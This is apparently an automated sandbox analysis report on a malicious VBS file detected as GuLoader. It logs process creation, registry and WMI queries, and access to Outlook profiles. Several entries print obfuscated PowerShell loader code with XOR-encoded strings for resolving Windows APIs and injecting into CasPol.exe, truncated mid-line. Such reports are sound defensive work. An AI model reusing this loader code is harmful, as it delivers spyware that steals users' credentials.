            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elcf2ed.d41.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@16/7@22/4
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\-0NDOIW
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:304:WilStaging_02
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Obfuscated command line found
